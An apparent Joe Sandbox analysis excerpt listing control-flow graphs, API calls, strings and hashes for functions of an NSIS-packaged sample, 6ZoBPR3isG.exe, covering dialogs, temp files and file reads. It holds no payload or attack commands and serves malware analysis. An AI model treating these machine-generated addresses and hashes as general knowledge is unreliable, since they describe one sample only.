                                                                                                              • Not Executed
                                                                                                              control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 269 403eb5-403ec2 SetWindowPos 264->269 270 403ec8-403ecb 264->270 267 40408c-404091 call 4043ab 265->267 268 40404e-404051 265->268 266->265 280 404096-4040b1 267->280 272 404053-40405e call 401389 268->272 273 404084-404086 268->273 269->270 275 403ee5-403eeb 270->275 276 403ecd-403edf ShowWindow 270->276 272->273 294 404060-40407f SendMessageW 272->294 273->267 279 40432c 273->279 281 403f07-403f0a 275->281 282 403eed-403f02 DestroyWindow 275->282 276->275 287 40432e-404335 279->287 285 4040b3-4040b5 call 40140b 280->285 286 4040ba-4040c0 280->286 290 403f0c-403f18 SetWindowLongW 281->290 291 403f1d-403f23 281->291 288 404309-40430f 282->288 285->286 297 4040c6-4040d1 286->297 298 4042ea-404303 DestroyWindow EndDialog 286->298 288->279 296 404311-404317 288->296 290->287 292 403fc6-403fd4 call 4043c6 291->292 293 403f29-403f3a GetDlgItem 291->293 292->287 299 403f59-403f5c 293->299 300 403f3c-403f53 SendMessageW IsWindowEnabled 293->300 294->287 296->279 302 404319-404322 ShowWindow 296->302 297->298 303 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 297->303 298->288 304 403f61-403f64 299->304 305 403f5e-403f5f 299->305 300->279 300->299 302->279 331 404126-40412b 303->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 303->332 309 403f72-403f77 304->309 310 403f66-403f6c 304->310 308 403f8f-403f94 call 404338 305->308 308->292 313 403fad-403fc0 SendMessageW 309->313 315 403f79-403f7f 309->315 310->313 314 403f6e-403f70 310->314 313->292 314->308 319 403f81-403f87 call 40140b 315->319 320 403f96-403f9f call 40140b 315->320 329 403f8d 319->329 320->292 328 403fa1-403fab 320->328 328->329 329->308 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->280 351 4041ff-404201 340->351 351->280 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->288 355 404244-404271 CreateDialogParamW 353->355 354->279 356 404219-40421f 354->356 355->288 357 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 355->357 356->280 358 404225 356->358 357->279 363 4042d0-4042e8 ShowWindow call 4043ab 357->363 358->279 363->288
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 3282139019-3251261122
                                                                                                              • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 396 403bc2-403bc6 390->396 391->392 394 403cd5-403cdd call 40140b 392->394 395 403c56-403c86 RegisterClassW 392->395 409 403ce7-403cf2 call 403dae 394->409 410 403cdf-403ce2 394->410 397 403da4 395->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 395->398 400 403bd8-403be4 lstrlenW 396->400 401 403bc8-403bd5 call 405cea 396->401 403 403da6-403dad 397->403 398->394 404 403be6-403bf4 lstrcmpiW 400->404 405 403c0c-403c14 call 405cbd call 4063e8 400->405 401->400 404->405 408 403bf6-403c00 GetFileAttributesW 404->408 405->384 412 403c02-403c04 408->412 413 403c06-403c07 call 405d09 408->413 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->403 412->405 412->413 413->405 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->410 431 403d91-403d98 call 40140b 425->431 426->397 427->428 429 403d32-403d42 GetClassInfoW RegisterClassW 428->429 430 403d48-403d6b DialogBoxParamW call 40140b 428->430 429->430 436 403d70-403d79 call 403a28 430->436 431->410 436->403
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,761336C0,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-2903015321
                                                                                                              • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 460 403187-40318c 452->460 461 4030bc-4030bf 452->461 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 462 403143-40314b call 402e8e 456->462 463 402fec-402ff2 456->463 460->445 464 4030c1-4030d9 call 40345d call 403447 461->464 465 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 461->465 462->460 466 403072-403076 463->466 467 402ff4-40300c call 405e99 463->467 464->460 488 4030df-4030e5 464->488 491 403139-40313e 465->491 492 40314d-40317d call 40345d call 4031d6 465->492 471 403078-40307e call 402e8e 466->471 472 40307f-403085 466->472 467->472 486 40300e-403015 467->486 471->472 479 403087-403095 call 4068b5 472->479 480 403098-4030a2 472->480 479->480 480->452 480->453 486->472 490 403017-40301e 486->490 488->460 488->465 490->472 493 403020-403027 490->493 491->445 499 403182-403185 492->499 493->472 495 403029-403030 493->495 495->472 497 403032-403052 495->497 497->460 500 403058-40305c 497->500 499->460 501 40318e-40319f 499->501 502 403064-40306c 500->502 503 40305e-403062 500->503 504 4031a1 501->504 505 4031a7-4031ac 501->505 502->472 506 40306e-403070 502->506 503->452 503->502 504->505 507 4031ad-4031b3 505->507 506->472 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6ZoBPR3isG.exe,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\6ZoBPR3isG.exe,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\6ZoBPR3isG.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-1635470676
                                                                                                              • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 516 406457-40645e 514->516 517 406662-40666d 515->517 518 406463-406470 515->518 516->515 520 406678-406679 517->520 521 40666f-406673 call 4063e8 517->521 518->517 519 406476-406482 518->519 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 538 4064f7-4064fe 529->538 530->529 535 4064e0-4064e3 530->535 536 406602-40660e call 4063e8 531->536 537 4065f4-406600 call 40632f 531->537 533 406630-406641 lstrlenW 532->533 534 406623-40662b call 40640a 532->534 533->515 534->533 535->529 540 4064e5-4064e8 535->540 549 406613-406619 536->549 537->549 542 406500-406502 538->542 543 406503-406505 538->543 540->529 545 4064ea-4064ee 540->545 542->543 547 406540-406543 543->547 548 406507-40652e call 4062b6 543->548 545->538 550 406553-406556 547->550 551 406545-406551 GetSystemDirectoryW 547->551 560 406534-40653b call 40640a 548->560 561 4065ce-4065d1 548->561 549->533 553 40661b 549->553 556 4065c1-4065c3 550->556 557 406558-406566 GetWindowsDirectoryW 550->557 555 4065c5-4065c9 551->555 554 4065de-4065e4 call 40667c 553->554 554->533 555->554 562 4065cb 555->562 556->555 559 406568-406572 556->559 557->556 567 406574-406577 559->567 568 40658c-4065a2 SHGetSpecialFolderLocation 559->568 560->555 561->554 565 4065d3-4065d9 lstrcatW 561->565 562->561 565->554 567->568 570 406579-406580 567->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 568->571 572 4065bd 568->572 573 406588-40658a 570->573 571->555 571->572 572->556 573->555 573->568
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-1230650788
                                                                                                              • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 656 4017f7-4017f8 call 405eb9 655->656 657 4017fd-401819 call 405ede 655->657 656->657 665 40181b-40181e 657->665 666 40188d-4018b6 call 405450 call 4031d6 657->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 700 401864-401865 667->700 678 401882-401888 668->678 683 402ace 678->683 680->681 682 4018d0-4018db CloseHandle 680->682 681->682 685 4018e1-4018e4 682->685 686 402ac5-402ac8 682->686 687 402ad0-402ad4 683->687 689 4018e6-4018f7 call 40640a lstrcatW 685->689 690 4018f9-4018fc call 40640a 685->690 686->683 697 401901-4022fc call 405a4e 689->697 690->697 697->687 700->678 702 401867-401868 700->702 702->668
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp$C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll$Call
                                                                                                              • API String ID: 1941528284-2512166951
                                                                                                              • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->713 723 4026c4-4026c9 720->723 721->722 725 40273c-402747 call 405fbf 721->725 722->713 732 40275f 722->732 723->713 724 4026cf-4026dd 723->724 727 4026e3-4026f5 MultiByteToWideChar 724->727 728 402798-4027a4 call 40632f 724->728 725->713 725->722 731 4026f7-4026fa 727->731 727->732 728->709 735 4026fc-402707 731->735 737 402762-402765 732->737 735->737 739 402709-40272e SetFilePointer MultiByteToWideChar 735->739 737->728 738 402767-40276c 737->738 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->735 742 402730 739->742 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->732 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
